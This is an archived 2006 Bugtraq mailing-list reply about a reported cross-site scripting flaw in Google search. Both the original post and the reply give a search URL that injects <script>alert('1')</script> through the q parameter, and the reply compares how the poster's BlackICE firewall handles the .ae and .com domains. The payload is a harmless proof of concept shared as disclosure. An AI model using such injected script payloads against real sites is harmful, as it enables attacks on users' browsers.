RE: google xss

To: <almfnod@xxxxxxxxx>, <bugtraq@xxxxxxxxxxxxxxxxx>
Subject: RE: google xss
From: "Andy Meyers" <andy.meyers@xxxxxxxxxxxx>
Date: Sun, 9 Apr 2006 16:50:27 -0700
In-reply-to: <20060404213447.10646.qmail@xxxxxxxxxxxxxxxxx>
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm
Thread-index: AcZcJ9vv2HsNVn5VQHiVo6UaDu9sbAACDl5A

My BlackICE stops this from XSS from happening, however changing the URL
from a .ae domain to a .com and leaving the rest in tact, I am then
prompted.

http://www.google.com/search?hl=ar&q=<script>alert("1")</script>&meta= 

Ashes

-----Original Message-----
From: almfnod@xxxxxxxxx [mailto:almfnod@xxxxxxxxx] 
Sent: Tuesday, April 04, 2006 2:35 PM
To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: google xss

http://www.google.ae/search?hl=ar&q=<script>alert("1")</script>&meta=

Follow-Ups:
- Re: google xss
  - From: pagvac
- Re: google xss
  - From: Jim Ley

References:
- google xss
  - From: almfnod

Prev by Date: Re: Bypassing ISA Server 2004 with IPv6
Next by Date: Re: Bypassing ISA Server 2004 with IPv6
Previous by thread: google xss
Next by thread: Re: google xss
Index(es):
- Date
- Thread